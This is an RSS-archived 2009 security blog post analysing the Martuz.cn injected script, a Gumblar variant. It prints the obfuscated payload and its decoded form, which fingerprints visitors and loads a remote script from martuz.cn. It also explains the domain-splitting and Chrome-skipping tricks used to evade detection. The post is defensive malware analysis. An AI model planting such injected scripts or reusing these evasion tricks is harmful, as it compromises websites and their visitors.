<p><code>(function(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();</code></p>
<p>The script looks and acts the same as the gumblar script. All <a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/">facts we know about the Gumblar</a> apply to Martuz as well. And the <a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/#removal">removal instructions</a> should be the same.</p>
<h3>What&#8217;s new?</h3>
<p>This is the decoded version of the script</p>
<p><code>var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;<br />
if((u.indexOf("Chrome")&lt;0)&amp;&amp;(u.indexOf("Win")&gt;0)&amp;&amp;(u.indexOf("NT 6")&lt;0)&amp;&amp;(document.cookie.indexOf("miek=1")&lt;0)&amp;&amp;(typeof(zrvzts)!=typeof("A"))){<br />
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");<br />
document.w rite("&lt;script src=//martu"+"z.cn/vid/?id="+j+"&gt;&lt;\/script&gt;");}</code></p>
<p>As you can see, this code injects an external script that loads content from &#8220;<em>martuz.cn</em>&#8221;</p>
<p>The Martuz version of the script is slightly more sophisticated.</p>
<p>Hackers made it more difficult to identify the script even when you decode it. They now split the domain name and have the script concatenate the parts: <em>&#8220;martu&#8221;+&#8221;z.cn&#8221;</em>, <em>&#8220;mart&#8221;+&#8221;uz.cn&#8221;</em>, etc. Simple scripts that search for &#8220;<em>martuz.cn</em>&#8221; may not detect the script.</p>
<h3>Martuz vs Google Chrome</h3>
<p>In Gumblar, hackers only wanted to load the script on Windows machines with version of Windows prior Vista (NT 6). In Martuz, they added a new check and no longer load the external script in a Google Chrome browser. I guess hackers read multiple forums and noticed that many webmasters used Google Chrome to detect the malicious code (Chrome detects calls to blacklisted sites and warns users). Now, if a webmaster loads an infected web sites in Chrome, there will be no warning since the external code won&#8217;t load. And the webmaster may mistakenly think that the site is clean and no additional removal action is required.</p>
<p>Don&#8217;t count on Google Chrome (and Safari) warnings. As you can see, hackers can make their code unnoticeable. And they can use new domain names every day, so that even if Chrome detects calls to the new malicious sites, it won&#8217;t warn you since those site are not blacklisted yet.</p>
<p>Make sure to check the source code of web pages. Or check web pages with my <a href="http://www.UnmaskParasites.com">Unmask Parasites</a> &#8211; it detects suspicious scripts without executing them.<br />
<a name="next"></a><br />
<h3>What&#8217;s next?</h3>
<p>Now that we all know how fast <em>Gumblaroids</em> (Gumblar-type exploits) can spread and how difficult to remove them from web sites and local computers, the Martuz incarnation should be shut down very soon. But I don&#8217;t think hackers will give up. We should be ready for new malicious domains and more and more sophisticated scripts.</p>
<p>And don&#8217;t forget hackers still have a big database of compromised FTP credentials and a lot of sites with hidden backdoor scripts that they can still use. And I&#8217;m sure they&#8217;ll use them.</p>
<h3>Let&#8217;s discuss the issue.</h3>
<p>If you have any additional information about the Martuz incarnation of the exploit or want to share your thoughts about Gumblaroids, please leave your comments below.</p>
<p>Similar posts:</p>
<ul>
<li><a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/">Gumblar .cn Exploit &#8211; 12 Facts About This Injected Script</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/">A Few More Facts About the Gumblar Attack From SophosLab and ScanSafe.</a></li>
<li><a href="http://blog.unmaskparasites.com/category/website-exploits/">All reviewed website exploits</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/feed/</wfw:commentRss>
		<slash:comments>40</slash:comments>
		</item>
	</channel>
</rss>
